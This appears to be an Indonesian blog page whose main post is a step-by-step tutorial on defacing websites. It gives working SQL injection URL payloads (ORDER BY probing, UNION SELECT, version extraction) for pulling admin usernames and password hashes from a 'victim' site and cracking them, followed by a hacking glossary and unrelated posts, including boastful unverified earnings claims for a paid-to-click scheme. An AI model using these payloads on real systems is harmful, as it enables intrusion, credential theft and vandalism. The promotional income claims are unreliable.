Sunday, November 24, 2013

Cara Mendeface Website Tanpa Bantuan Software.

Men-deface sebuah situs itu sebenarnya pekerjaan yang tidak terlalu sulit. Bahkan untuk sekelas Hacker pemula dapat melakukannya. Banyak sekali software yang dapat digunakan seperti Havij dan sejenisnya, dan tinggal mengikuti langkahnya, semuanya jadi mudah. Tinggal cari Dork-nya, kemudian identifikasi situs korban, dan eksekusi.
Namun, ada dasar teknik tanpa software yang dapat kita lakukan. Teknik ini sebenarnya agak rumit, namun akan saya coba sederhanakan agar mudah dipraktekkan.
Sebelumnya kita harus tahu dulu yang dimaksud defacing itu sebenarnya apa. Defacing adalah tindakan untuk mengganti file index.html atau index.php situs korban dengan file yang kita miliki. Ketika file index.html atau index.php situs korban kita ganti dengan index.html atau index.php yang kita inginkan, praktis publik akan hanya melihat index.html ataupun index.php yang kita miliki.
Pengetahuan dasar yang harus dimiliki untuk melakukan defacing.
  1. SQL Injection (Untuk menganalisis loop website)
  2. Sandi Admin 
  3. Shell Script (untuk mendapatkan Kontrol Admin)
Sekarang, mari kita coba dengan cara yang paling sederhana agar mudah dipahami.
Langkah pertama adalah dengan menguji kerentanan situs korban. Misalnya saja kita mengidentifkasi situs korban sebagai berikut: http://www.korban.com/news.php?id=5. Mari kita uji apakah situs tersebut aman atau mudah dideface. Lankah yang paling sederhana adalah dengan menamnahkan tanda kutipan (‘) ke akhir url dari situs korban.
Dari contoh diatas, kemudian situs korban kita uji kerentanannya sebagai berikut:
 [code]http://www.korban.com/news.php?id=5 '[/code]
jadi jika kita mendapatkan beberapa error seperti dibawah ini:
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…” atau sesuatu yang serupa yang berarti Situs rentan terhadap SQL injection.
Langkah kedua, setelah kita tahu betul bahwa situs korban tersebut rentan untuk di deface, kita lakukan langkah penemuan kolom dengan menggunakan perintah Order by. Kita lakukan pengurutan nomer sampai mendapatkan error. Sebagai contoh:
[code]http://www.korban.com/news.php?id=5 order by 1 / * <- tidak ada kesalahan
http://www.korban.com/news.php?id=5 order by 2 / * <- tidak ada kesalahan
http://www.korban.com/news.php?id=5 order by 3 / * <- tidak ada kesalahan
http://www.korban.com/news.php?id=5 order by 4 / * <- error (kita mendapatkan pesan seperti kolom ini '4 Unknown 'dalam' klausa order 'atau sesuatu seperti itu)
[/code]
Dari hasil tersebut, berarti bahwa MySQL situs korban memiliki 3 kolom, karena pada saat diurutkan (incrementing) sampai langkah ke empat terdapat error. 
Langkah ketiga adalah dengan melakukan pengujian fungsi  UNION. Dengan fungsi ini kita dapat memilih lebih banyak data dalam satu pernyataan sql.
Contohnya sebagai berikut:
[code]http://www.korban.com/news.php?id=5 union all select 1,2,3 (kita unionkan semua kolom yang sudah kita dapatkan dilangkah ke 2 diatas.)
[/code]

Catatan Penting: jika kita melihat beberapa nomor di layar monitor, yaitu 1 atau 2 atau 3 maka UNION bekerja.
Langkah keempat adalah melakukan pengujian pada versi MySQL situs korban dengan perintah tambahan tanda minus dua kali (–). Jadinya seperti dibawah ini:
[code]http://www.korban.com/news.php?id=5 union all select 1,2,3--
[/code]

Kemudian amati output yang muncul di monitor. Misalnya saja di monitor muncul angka 2, segera kita ganti URL target dengan kode “@@version” atau “version()” atau kode tertentu seperti “4.1.33″ atau yang mirip dengan angka tersebut.
URL target yang kita ganti adalah sebagai berikut:
[code]http://www.korban.com/news.php?id=5 union all select 1,@@version,3--
[/code]
Kemudian tekan enter (lakukan eksekusi).
Jika kemudian dilayar monitor muncul error sebagai berikut: “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”, kemudian langkah selanjutnya adalah melakukan konversi dengan mengubah URL target sebagai berikut:
[code]http://www.korban.com/news.php?id=5 union all select 1,convert(@@version using latin1),3
atau
http://www.korban.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3[/code]

Nah, versi dari MySQL situs korban dapat kita identifikasi.
Langkah selanjutnya adalah dengan mendeteksi nama-nama dari setiap kolom tabel databse situs korban. Jika versi MySQL nya dibawah versi 5, kita dapat mengira-iranya. Misalnya saja kalau Platformnya wordpress pastilah nama tabelnya sekitar wp-content, wp-users, wp-options dan seterusnya. Dan nama kolom umumnya adalah: username, user_name, password, pass, passwd, pwd dll ..
Coba kita lakukan pengecakan nama tabel dari MySQL situs korban dengan perintah dibawah ini:
[code]http://www.korban.com/news.php?id=5 union all select 1,2,3 from admin
[/code]
Jika di monitor muncul angka misalnya “2″, maka berarti bahwa nama tabel tersebut adalah benar. Langkah selanjutnya adalah mengidentifikasi nama kolom dalam tabel admin. Dengan mengganti angka 2 dengan nama kolom yang kita inginkan. Perintahnya adalah sebagai berikut:
[code]http://www.korban.com/news.php?id=5 union all select 1,username,3 from admin
[/code]

Jika muncul nama di layar monitor, maka itulah nama admin dari situs korban. Langkah selanjutnya adalah mengidentifikasi password admin.
[code]http://www.korban.com/news.php?id=5 union all select 1,password,3 from admin
[/code]
Jika dilayar muncul kode (biasanya dalam bentuk enkripsi MD5), maka sukseslah injeksi MySQL kita untuk selanjutnya melakukan deface. Kode yang muncul dilayar, kemudian kita catat, dan lakukan dekripsi MD5 dengan Decrypt MD5 Generator yang banyak beredar di internet. Setelah nama admin kita dapet, password admin kita dapet, terus langkah selanjutnya ya terserah Anda.
Tetapi perlu diingat, pengetahuan ini bukan digunakan untuk mengajarkan kejahatan. Tetapi dari semua langkah tersebut diatas dapat digunakan oleh webmaster situs bersangkutan untuk menguji kerentanan situsnya. Jika dicoba dengan cara ini kemudian berhasil, maka segera lakukan perbaikan. Jangan sampai terlambat.

20 Istilah-istilah yang wajib hacker ketahui


Dalam dunia komputer remaja ini, selalu berkaitan dengan berbagai bahasa atau istilah-istila. Dunia komputer seakan menjadi ilmu external yang sangat mahal harganya, tidak seperti halnya dengan pembelajaran sekolah biasanya, dalam dunia komputer bukan hanya pengetahuan yang dapat di andalkan tapi kita di ajak agar selalu berpikir logisdan seakan menyusun taktik sehingga menghasilkan tujuan yang di harapkan.


nah, jika berbicara dalam bahasa hacking, saat ini ada beberapa hal yang mesti kita ketahui yaitu istilah-istilah dasar yang perlu di pelajari dan di ingat, mengapa? Hal yang pertama yaitu ketika kita di ajak merekrut di dunia hacking mau tidak mau kita secepatnya harus mengetahui bahasa dasar yang sering di pergunakan dalam dunia hacking atau bisa di katakan bekal pertama dan yang kedua karna seiring perkembangan zaman saat ini kita seakan mau tidak mau mengikuti arus perkembangannya. Salah satunya kita selalu di hubungkan dengan dunia manya atau internet.




Ketika itu juga perkembangan masyarakat internet dan IPTEK sehingga menghasilkan masyarakat ahli komputer jahil "hacking" yang ketika anda terjerat maka habislah anda di perdaya mereka dengan pengetahuan nya. Maka dari itu ada beberapa bahasa dasar / istilah-istilah komputer yang dapat kita ketahui bersama yaitu - cyber4rt:

  • DDoS ,kenal dengan kegiatan ddos atacker? Nah ddos merupakan kegiatan Membuat suatu sistem crash & karena overload sehingga tidak bisa diakses atau mematikan service.
  • Bug ,Bug Kesalahan pada
    pemrograman yang menyebabkan sistem dapat dieksploitasi atau error dengan kondisi tertentu. Dalam web hacking, terdapat beberapa bug seperti RFI, LFI, SQLi, RCE, XSS, dll.
  • Deface ,sama seperti kegiatan yang telah Deface share sebelummya yang Merubah tampilan halman suatu website secara paksa dan illegal.
  • Patch Perbaikan terhadap bug dengan mengupdate sistem
    yang memiliki vurnerable
    system.
  • Vurnerable merupakan sebuah Sistem yang memiliki bug sehingga rentan terhadap serangan, dan ketika hal ini terjadi maka dapat di jadikan celah dalam melakukan deface
  • Shell adalah Inti dari sistem operasi. Shell dapat digunakan untuk mengendalikan kerja sistem operasinya. Dan ketika shell telah di dapatkan maka dapat dengan mudah mengotak-atik isi bahkan melakukan pencurian data
  • Phising Adalah tindakan memperoleh informasi pribadi seperti User ID, password, PIN, nomor rekening bank, nomor kartu kredit Anda secara ilegal.. Phising merupakan hal mudah yang dapat menjerat korban dan menemukan informasinya seperti deface facebook dan lain-lain, contoh phising facebook: Phisng facebook
  • Fake Login sama halnya dengan kegiatan phising (memancing) yang merupakan Halaman tiruan/palsu yang
    dibuat untuk mengelabui user,
    bertujuan untuk mencuri
    informasi penting dari user Seperti pada kasus pencurian email n password Friendster, Facebook
  • RFI merupakan Penyisipan sebuah file dari luar ke dalam sebuah webserver dengan tujuan script di dalam akan dieksekusi pada saat file yang disisipi di-load.
  • LFI Suatu bug dimana kita bisa menginclude kan file yang merupakan file yang berada didalam server yg bersangkutan ke page yang vulnerable LFI maksudnya
  • Keylogger Adalah mesin atau software yang dipasang atau diinstal di komputer agar mencatat semua aktivitas yang terjadi pada keyboard dan software ini dapat bekerja diam diam alias tidak terketahui oleh kita secara kasat mata
  • SQL Injection merupakan Salah satu jenis penyerangan
    yang mengijinkan user tidak sah
    (penyerang) untuk mengakses
    database server.
  • Virus kelihatan tidak asing lagi bagi kita yang merupakan kumpulan bahasa pemprograman yang berupa Kode script jahat yang yang telah di program untuk mengandakan dirinya dan menginfeksi serta menjadi parasit bagi suatu sistem file yang diinfeksinya. Oleh sebab itu kita sering bertanya mengapa virus tidak dapat di basmikan karna virus itu menggandakan dirinya dengan cepat. Sekarang kode jenis ini akan sangat mudah terdeteksi pada aplikasi yang memeriksa crc32 dari dirinya.
  • Debug merupakan Kegiatan mencari bug pada aplikasi dan memperbaiki bug yang ditemukan.
  • Fake Process merupakan Proses tiruan yang dibuat untuk menyembunyikan nama proses asli, bertujuan untuk mengelabui admin sistem. Seperti mem-fake "./backdoor" menjadi "usr/sbin/httpd", sehingga ketika di "ps -ax",
    proses "./backdoor" berubah
    menjadi "usr/sbin/httpd" sehingga dapat mengelabui sasarannya
  • Backdoor merupakan Pintu belakang untuk masuk ke sistem yang telah brhasil di exploitasi oleh attacker. Bertujuan untuk jalan masuk lagi ke sistem korban sewaktu-waktu
  • Malicious Code/Script adalah Kode yang dibuat untuk
    tujuan jahat atau biasa disebut
    kode jahat.
  • Worm merupakan kelom virus yang terbuat dari Kode jahat yang sistim kerjanya seperti cacing, menggandakan diri dan menyebar, tidak menopang pada file. Kebanyakan di Indonesia adalah kode jenis ini.
  • Trojan merupakan Kode jahat yang sistim kerjanya masuk ke dalam sistem untuk mengintip dan mencuri informasi penting yg ada didalamnya kemudian
    mengirimnya kepada pemilik
    trojan.
  • XSS merupakan suatu cara
    memasukan code/script 
    kedalam suatu web site dan
    dijalankan melalui browser di client-cyber4rt
sumber : jurnal.heck.in

Friday, August 9, 2013

Bukti Pembayaran Neobux

Neobux adalah program Paid To Click (PTC) yang BENAR-BENAR MEMBAYAR. Untuk mengikuti PTC ini anda tidak diharuskan mempunyai website atau blog dan keahlian khusus karena cara bermainnya sangat gampang yaitu tinggal klik 4 iklan setiap harinya (4 orange fixed advertisement) << wajib diklik plus iklan tambahan lain.
NEOBUX sudah berdiri lebih dari 5 tahun dan belum pernah mendapat masalah selama perjalanannya (selalu membayar tepat waktu yaitu instant payment)
Jadi untuk anda yang masih bilang Neobux adalah SCAM berarti anda belum mencobanya sampai selesai (payout) alias iseng saja. Saya sendiri sudah menghasilkan ratusan juta (lihat dibawah bukti2 pembayarannya)
Berikut adalah sebagian dari screenshot pembayaran yang sudah saya terima melalui Paypal (kmd ditransfer ke akun Bank Mandiri saya).
Pembayaran Neobux (first) 17 Januari 2012:
Pembayaran kedua neobux (second) 27 Januari 2012:
Pembayaran bulan Juni dari Neobux 21 June 2012:
Pembayaran bulan Juli dari Neobux (withdraw awal bulan Juli minggu pertama)
Pembayaran Akhir bulan Juli dari Neobux (31 Juli 2012)
Pembayaran bulan Agustus dari Neobux (27 Agustus 2012)
Pembayaran bulan September dari Neobux (23 September 2012)
Pembayaran bulan Oktober dari Neobux (31 Oktober 2012)
http://i49.tinypic.com/2qulwz9.jpg
Sudah percaya pada Neobux dan ingin bergabung?

Saturday, November 3, 2012

Kisah-Kisah Shahih Nabi & Rasul bag 2

E-book Kisah-Kisah Shahih Nabi & Rasul bag 2 @ creativboy 2012


Jangan lupa komentarnya terimakasih!

Kisah-Kisah Shahih Nabi & Rasul bag 1

E-book Kisah-Kisah Shahih Nabi & Rasul Creativeboy@2012



Jangan lupa tinggalkan komentarnya Sobat!

DOWNLOAD PAKET E-BOOK BELAJAR OFFICE WORD,EXCEL & POWERPOINT

DOWNLOAD PAKET E-BOOK BELAJAR OFFICE WORD,EXCEL & POWERPOINT
Bismillahirrahmanirrahim..., akhirnya ada waktu juga untuk posting kali ini saya akan membagikan 1 paket E-book office lengkap yaitu : Word, Excel n Powerpoint semoga ini bisa berguna bagi shobat semua.., terutama bagi kalian yg lagi nyari tutorial/modul belajar office, mungkin E-book ini akan sangat membantu shobat semua, Ok tanpa banyak dongeng langsung saja sedot dengan mengklik link dibawah ini!

======================================================================

E-book MS WORD


====================================================

E-book MS EXCEL

====================================================

E-book MS PowerPoint




Terimakasih smoga ini bermanfaat bagi kita semua jangan lupa tinggalkan komentarnya!